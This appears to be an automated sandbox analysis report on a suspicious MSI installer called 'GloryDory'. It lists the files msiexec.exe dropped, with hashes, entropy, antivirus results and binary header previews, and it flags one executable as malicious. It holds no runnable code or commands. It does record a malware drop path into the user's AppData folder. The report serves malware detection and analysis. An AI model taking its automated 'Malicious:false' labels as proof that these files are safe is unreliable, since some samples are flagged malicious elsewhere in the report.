                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {26C6701E-5BA5-48FD-87C5-16BC3575B429}, Number of Words: 10, Subject: GloryDory, Author: OrbitalMast LLC, Name of Creating Application: GloryDory, Template: ;1033, Comments: This installer database contains the logic and data required to install GloryDory., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1669120
                                                                                                                                                                                                                                                  Entropy (8bit):7.187836999350755
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:49152:5Sj3YhW8zBQSc0ZnSKSZKumZr7A+zafUWM1q:oYY0ZnQK/A7fQ
                                                                                                                                                                                                                                                  MD5:3CB6B99B20930AC0DBADC10899DC511E
                                                                                                                                                                                                                                                  SHA1:570C4AB78CF4BB22B78AAC215A4A79189D4FA9ED
                                                                                                                                                                                                                                                  SHA-256:EA1792F689BFE5AD3597C7F877B66F9FCF80D732E5233293D52D374D50CAB991
                                                                                                                                                                                                                                                  SHA-512:AEDF58EA01D59CCE191CB9C0F83DBDBF7E3E8F049C764B577D6A957CB5229C50DDA7EC6760CA43AD4DBDB085AE02B07BC818F69CA08373243019AF6683E4931C
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:......................>.......................................................E.......a...............................(...)...*...+...,...-...........A...B...C...D...E...F...G...........................................................................................................................................................................................................................................................................................................................................................<...........!...3............................................................................................... ...+..."...#...$...%...&...'...(...)...*...1...,...-......./...0...4...2...;...?...5...6...7...8...9...:.......=.......>.......@...A...B...C...D...........G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                                                                                                                                                                                                  C:\Windows\Installer\MSIF101.tmp

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):446944
                                                                                                                                                                                                                                                  Entropy (8bit):6.403916470886214
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                                                                                                  MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                                                                                                  SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                                                                                                  SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                                                                                                  SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                                                                  • Filename: Document-19-51-48.js, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: dsa.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: Document-19-27-03.js, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: DLPAgent.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: Document-21-41-00.js, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: CITROEN.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: DLPAgent.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: 6ylVfr0IVw.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: Document-19-25-24.js, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: vfs.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Windows\Installer\MSIF160.tmp

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):446944
                                                                                                                                                                                                                                                  Entropy (8bit):6.403916470886214
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                                                                                                  MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                                                                                                  SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                                                                                                  SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                                                                                                  SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                                                                  • Filename: Document-19-51-48.js, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: dsa.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: Document-19-27-03.js, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: DLPAgent.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: Document-21-41-00.js, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: CITROEN.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: DLPAgent.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: 6ylVfr0IVw.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: Document-19-25-24.js, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: vfs.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Windows\Installer\MSIF1BF.tmp

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):446944
                                                                                                                                                                                                                                                  Entropy (8bit):6.403916470886214
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                                                                                                  MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                                                                                                  SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                                                                                                  SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                                                                                                  SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Windows\Installer\MSIF1DF.tmp

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):446944
                                                                                                                                                                                                                                                  Entropy (8bit):6.403916470886214
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                                                                                                  MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                                                                                                  SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                                                                                                  SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                                                                                                  SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Windows\Installer\MSIF22E.tmp

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):401042
                                                                                                                                                                                                                                                  Entropy (8bit):6.591849280749257
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6144:+MvZx0Flyv/UB8zBQSnuJnO6n4ZSaHwLvFnNLqrFWeyp1uBxfAOT3VDqO16:+MvZx0FlS68zBQSncb4ZPQTpAjZxqO16
                                                                                                                                                                                                                                                  MD5:9FCEE1CA0E8FED4486A6EC3F186817BE
                                                                                                                                                                                                                                                  SHA1:3A325D1CFE8A7116D24BC4A9103DF0554183FDDD
                                                                                                                                                                                                                                                  SHA-256:A654A2E127843FB770B6FEB20EB0F7E14EC68AD58A27439E9B76DBD8DB56F780
                                                                                                                                                                                                                                                  SHA-512:AE998EF41B62975697EDD261CA81DB52B1ACFF7FAB7C5D882CAEAA76E15CBCA5A854500B825706B9489F81F59FDB25C60B12E17F535EA3D7D5CA8121EC053D25
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:...@IXOS.@.....@QuCY.@.....@.....@.....@.....@.....@......&.{68C54E68-8D6C-454F-B2BE-2596868E8867}..GloryDory..das.msi.@.....@...C.@.....@........&.{26C6701E-5BA5-48FD-87C5-16BC3575B429}.....@.....@.....@.....@.......@.....@.....@.......@......GloryDory......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{B48CC27C-9823-4256-8235-834BFD2D0DBB}:.C:\Users\user\AppData\Roaming\OrbitalMast LLC\GloryDory\.@.......@.....@.....@......&.{4A323D5F-6D73-4C26-8E39-BE8928DA13EB}..01:\Software\OrbitalMast LLC\GloryDory\Version.@.......@.....@.....@......&.{2B132521-4E05-4E2E-93F1-6029E2DAB7E0}2.C:\Users\user\AppData\Roaming\vierm_soft_x64.dll.@.......@.....@.....@........CreateFolders..Creating folders..Folder: [1]".:.C:\Users\user\AppData\Roaming\OrbitalMast LLC\GloryDory\.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]...@.....@...

                                                                                                                                                                                                                                                  C:\Windows\Installer\MSIF29D.tmp

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):399328
                                                                                                                                                                                                                                                  Entropy (8bit):6.589290025452677
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6144:gMvZx0Flyv/UB8zBQSnuJnO6n4ZSaHwLvFnNLqrFWeyp1uBxfAOT3VDqO1:gMvZx0FlS68zBQSncb4ZPQTpAjZxqO1
                                                                                                                                                                                                                                                  MD5:B9545ED17695A32FACE8C3408A6A3553
                                                                                                                                                                                                                                                  SHA1:F6C31C9CD832AE2AEBCD88E7B2FA6803AE93FC83
                                                                                                                                                                                                                                                  SHA-256:1E0E63B446EECF6C9781C7D1CAE1F46A3BB31654A70612F71F31538FB4F4729A
                                                                                                                                                                                                                                                  SHA-512:F6D6DC40DCBA5FF091452D7CC257427DCB7CE2A21816B4FEC2EE249E63246B64667F5C4095220623533243103876433EF8C12C9B612C0E95FDFFFE41D1504E04
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................J......J..5.......................J......J......J..........Y..."......".q............."......Rich....................PE..L....<.a.........."......^...........2.......p....@..........................P......".....@.................................0....................................5...V..p....................X.......W..@............p.. ............................text....\.......^.................. ..`.rdata..XA...p...B...b..............@..@.data....6..........................@....rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Windows\Installer\inprogressinstallinfo.ipi

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                  Entropy (8bit):1.5683445311085658
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:y8PhTuRc06WXOKFT5dX2qSwYAErCyE9c7uSiHqSwmT3Nxv:dhT1MFTbX2qZnwCx4WHqZW
                                                                                                                                                                                                                                                  MD5:85C56D88D6DF48C9A03823764F257EEB
                                                                                                                                                                                                                                                  SHA1:F0E98723D2610D6AA633795DCF159A1198D23D4B
                                                                                                                                                                                                                                                  SHA-256:C3ABF141B4A345CC34922264929B0C6DB8A0C5D8018116CA1B0A1C0C944B4CA9
                                                                                                                                                                                                                                                  SHA-512:51756EF419DC69AE3478A7141E4E04F04F22EABC91332F924DA075E31F17809AE35399C22C1C37CB89B669B3795ACF46C90C54526B012DFB0955874131ED22FF
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF01B5DC13092BA872.TMP

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                  Entropy (8bit):1.5683445311085658
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:y8PhTuRc06WXOKFT5dX2qSwYAErCyE9c7uSiHqSwmT3Nxv:dhT1MFTbX2qZnwCx4WHqZW
                                                                                                                                                                                                                                                  MD5:85C56D88D6DF48C9A03823764F257EEB
                                                                                                                                                                                                                                                  SHA1:F0E98723D2610D6AA633795DCF159A1198D23D4B
                                                                                                                                                                                                                                                  SHA-256:C3ABF141B4A345CC34922264929B0C6DB8A0C5D8018116CA1B0A1C0C944B4CA9
                                                                                                                                                                                                                                                  SHA-512:51756EF419DC69AE3478A7141E4E04F04F22EABC91332F924DA075E31F17809AE35399C22C1C37CB89B669B3795ACF46C90C54526B012DFB0955874131ED22FF
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF07B80D9F27CBE04D.TMP

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                  Entropy (8bit):1.5683445311085658
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:y8PhTuRc06WXOKFT5dX2qSwYAErCyE9c7uSiHqSwmT3Nxv:dhT1MFTbX2qZnwCx4WHqZW
                                                                                                                                                                                                                                                  MD5:85C56D88D6DF48C9A03823764F257EEB
                                                                                                                                                                                                                                                  SHA1:F0E98723D2610D6AA633795DCF159A1198D23D4B
                                                                                                                                                                                                                                                  SHA-256:C3ABF141B4A345CC34922264929B0C6DB8A0C5D8018116CA1B0A1C0C944B4CA9
                                                                                                                                                                                                                                                  SHA-512:51756EF419DC69AE3478A7141E4E04F04F22EABC91332F924DA075E31F17809AE35399C22C1C37CB89B669B3795ACF46C90C54526B012DFB0955874131ED22FF
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF28B4DE99F83A16D6.TMP

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                  Entropy (8bit):1.2563734827764652
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:NmLufPvGFXO7T5yX2qSwYAErCyE9c7uSiHqSwmT3Nxv:gL12TEX2qZnwCx4WHqZW
                                                                                                                                                                                                                                                  MD5:0EFDF746E575A82FC3B2E37FC6F62063
                                                                                                                                                                                                                                                  SHA1:F6BE1DB30500C516175EE4B6E7731BDA05872734
                                                                                                                                                                                                                                                  SHA-256:82EEACF622F4F47B03069FAC6135EE2F93E48EF49F75E532894D0168CD7DA8AB
                                                                                                                                                                                                                                                  SHA-512:4C8565344B1BD6FC30E56715E2E4D7D901102D1C8AF0ED0DBF91F34C6E42F5C5C0085904FB2113C0928455E33CE75D5331BBDC79AF56FE2F28298F26D32F9495
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF59A0B4535E503852.TMP

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                  Entropy (8bit):1.2563734827764652
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:NmLufPvGFXO7T5yX2qSwYAErCyE9c7uSiHqSwmT3Nxv:gL12TEX2qZnwCx4WHqZW
                                                                                                                                                                                                                                                  MD5:0EFDF746E575A82FC3B2E37FC6F62063
                                                                                                                                                                                                                                                  SHA1:F6BE1DB30500C516175EE4B6E7731BDA05872734
                                                                                                                                                                                                                                                  SHA-256:82EEACF622F4F47B03069FAC6135EE2F93E48EF49F75E532894D0168CD7DA8AB
                                                                                                                                                                                                                                                  SHA-512:4C8565344B1BD6FC30E56715E2E4D7D901102D1C8AF0ED0DBF91F34C6E42F5C5C0085904FB2113C0928455E33CE75D5331BBDC79AF56FE2F28298F26D32F9495
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF5AD112C063E48280.TMP

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF7DC560C654532278.TMP

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF807DDA6E2CC4FCB3.TMP

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF86BE8C190D62B24E.TMP

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF93ACB531B807E54B.TMP

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):73728
                                                                                                                                                                                                                                                  Entropy (8bit):0.138484202186345
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:5NxSAhMwTx0RqipV0RQ0RqipV0RYAEV0yjCyEV3+bpGw7sGgSi+FSnc+FC0:5NxvnTkqSwVqSwYAErCyE9c7uSi0k
                                                                                                                                                                                                                                                  MD5:A974A3C4E0428978197CC3D2FE7CFD71
                                                                                                                                                                                                                                                  SHA1:1469D8AAB74FF72EC8EB371B188D03CCD1170AD9
                                                                                                                                                                                                                                                  SHA-256:53CBD860FC95C1D099C02D223627134FBC625783131DC5A49224E6B6F75D0BB0
                                                                                                                                                                                                                                                  SHA-512:8C60B46C89A7728A16D242376B2B3DC143EE60ACA042471C16567311260D2C20C1AB233479CC7FEE4AE81A3ADD0DC309F517F9BB9C1556C1D0AF39AC621C34BA
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Windows\Temp\~DFB0630E4CDB4C0FEB.TMP

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):512
